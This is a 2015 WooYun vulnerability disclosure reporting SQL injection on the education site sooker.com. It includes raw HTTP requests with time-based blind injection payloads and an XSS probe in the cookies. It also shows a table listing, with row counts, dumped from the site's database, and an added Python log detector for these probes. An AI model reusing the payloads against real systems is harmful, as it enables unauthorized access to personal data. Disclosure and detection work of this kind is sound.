
Vulnerability summary

Defect ID: wooyun-2015-0144714

Title: SQL injection in 搜课网 (sooker.com) affects the data of 300,000 students

Vendor: 搜课网

Author: 路人甲

Submitted: 2015-10-04 23:36

Fix deadline: 2015-11-18 23:38

Published: 2015-11-18 23:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-04: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-11-18: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Detailed description:

GET /index.php?act=clist&app=netschool&cate_id=5&course_name=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&price=4 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.sooker.com/
Cookie: SOOKER_ID=qt0cp925vavoobp1qroftfu6o1; Hm_lvt_e41b4b552f43a687801c48660b267965=1443837719,1443837719; Hm_lpvt_e41b4b552f43a687801c48660b267965=1443837719; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=D0C1E09A967EBCCE; BAIDUID=A40D88F89D1AF4FB5C85AB9DFC56E7FF:FG=1
Host: www.sooker.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


GET /index.php?act=clist&app=school&school_name=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.sooker.com/
Cookie: SOOKER_ID=qt0cp925vavoobp1qroftfu6o1; Hm_lvt_e41b4b552f43a687801c48660b267965=1443837719,1443837719; Hm_lpvt_e41b4b552f43a687801c48660b267965=1443837719; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=D0C1E09A967EBCCE; BAIDUID=A40D88F89D1AF4FB5C85AB9DFC56E7FF:FG=1
Host: www.sooker.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
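Both requests above carry the same time-based blind SQL injection probe, if(now()=sysdate(),sleep(0),0) wrapped in quote-breakout and comment variants, in the course_name and school_name parameters. As an added example that is not part of the original report, the following Python detector parses an access-log style request line, URL-decodes each query parameter and flags the indicators those probes rely on; the probe line is the first request from the report and the clean request is constructed for comparison.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators of a time-based blind SQL injection probe, matched against each
# URL-decoded, lower-cased query parameter value. The first two are exactly
# what the course_name / school_name payloads in the report rely on.
INDICATORS = [
    ("sleep()", re.compile(r"\bsleep\s*\(\s*\d+\s*\)")),                        # MySQL sleep(N)
    ("now()=sysdate()", re.compile(r"now\s*\(\s*\)\s*=\s*sysdate\s*\(\s*\)")),  # tautology used as the condition
    ("benchmark()", re.compile(r"\bbenchmark\s*\(\s*\d+")),                     # CPU-bound delay alternative
    ("quote-breakout", re.compile(r"""['"]\s*(xor|or|and)\s*\(""")),            # ' or " then a boolean operator
]

# First request line from the report (probe) and a constructed clean request.
PROBE_REQUEST = ("GET /index.php?act=clist&app=netschool&cate_id=5&course_name="
                 "if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))"
                 "OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&price=4 HTTP/1.1")
CLEAN_REQUEST = "GET /index.php?act=clist&app=netschool&cate_id=5&course_name=sleep+training&price=4 HTTP/1.1"


def decode_params(request_line: str) -> dict:
    """Return {name: decoded value} for the query string of an access-log style
    request line such as 'GET /index.php?a=1&b=2 HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        return {}
    # parse_qsl decodes %xx escapes and '+' once; keep_blank_values keeps empty params
    return dict(parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True))


def suspicious_params(request_line: str) -> dict:
    """Map each parameter carrying an indicator to the list of indicator names
    that fired; an empty dict means nothing matched."""
    findings = {}
    for name, value in decode_params(request_line).items():
        hits = [label for label, pattern in INDICATORS if pattern.search(value.lower())]
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines) -> list:
    """Run suspicious_params over an iterable of request lines and return
    (1-based line number, findings) for every line that matched."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := suspicious_params(line))]


if __name__ == "__main__":
    for lineno, findings in scan_log([PROBE_REQUEST, CLEAN_REQUEST]):
        print(f"line {lineno}: {findings}")
```

A course name such as "sleep training" is not flagged because the patterns require the function-call form; tune the indicator list to the database in use before deploying it against real traffic.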

Proof of vulnerability:

[Screenshot: 1.png]


Database: 51edu_ecmall
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| `51edu_zn_user_info` | 19253938 |
| `51edu_store_clickinfo` | 8676153 |
| `51edu_tj_course_views` | 6442506 |
| `51edu_2013_search_keyword` | 6074493 |
| `51edu_tj_store_views` | 3795169 |
| `51edu_store_corelative` | 1639335 |
| `51edu_menu_click` | 1212467 |
| `51edu_log_search` | 977307 |
| `51edu_zn_call_keyword` | 907364 |
| `51edu_search` | 551750 |
| `51edu_2012_course_type` | 546569 |
| `51edu_admin_log` | 485723 |
| `51edu_ip` | 440079 |
| `51edu_zn_400_log` | 382856 |
| `51edu_2012_course_comment` | 372802 |
| `51edu_course_keywords` | 325787 |
| `51edu_2012_course_area` | 319793 |
| `51edu_member` | 293432 |
| `51edu_2012_course2013_area` | 278948 |
| `51edu_zn_400_info` | 272779 |
| `51edu_zn_score` | 239596 |
| `51edu_zn_my_log` | 217864 |
| `51edu_zn_backclick` | 217261 |
| `51edu_course2011` | 212081 |
| `51edu_goods_fields` | 204738 |
| `51edu_goods` | 204737 |
| `51edu_course2011_bak` | 199010 |
| `51edu_school_login_info` | 178399 |
| `51edu_zn_400_callinfo` | 178363 |
| `51edu_score_detail_course` | 173597 |
| `51edu_school_login` | 148922 |
| `51edu_course` | 136904 |
| `51edu_400_realtime_log` | 104779 |
| `51edu_400_number` | 90000 |
| `51edu_uploaded_file` | 74427 |
| `51edu_news_content` | 73099 |
| `51edu_tj_course_info` | 72894 |
| `51edu_2012_order` | 60394 |
| `51edu_zn_agency_school` | 59549 |
| `51edu_zn_400_number_bak` | 59509 |
| `51edu_zn_bill` | 50234 |
| `51edu_store_area` | 48904 |
| `51edu_zm_demand` | 46333 |
| `51edu_course_page_keywords` | 40764 |
| `51edu_2012_school_cateintro` | 39246 |
| `51edu_2012_cart` | 37565 |
| `51edu_zn_tuijian_sms` | 36526 |
| `51edu_zn_sms` | 31652 |
| `51edu_2012_tj_school_category` | 29070 |
| `51edu_message` | 25214 |
| `51edu_store` | 24679 |
| `51edu_category_course` | 21355 |
| `51edu_2012_reglog` | 20899 |
| `51edu_user_priv` | 19465 |
| `51edu_zm_user_visit` | 18503 |
| `51edu_zn_store_extra` | 17752 |
| `51edu_zn_agency_bill` | 15708 |
| `51edu_zm_demand_school` | 14450 |
| `51edu_temp_400_history` | 14013 |
| `51edu_tj_store_calls` | 12988 |
| `51edu_sx_store_category` | 12112 |
| `51edu_goods_qa` | 12018 |
| `51edu_teacher` | 11870 |
| `51edu_zn_400_queue_bak` | 11289 |
| `51edu_zm_upgradeschool` | 11152 |
| `51edu_2012_school_stats` | 10024 |
+--------------------------------------+---------+

Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report

Vulnerability Rank: 15 (WooYun rating)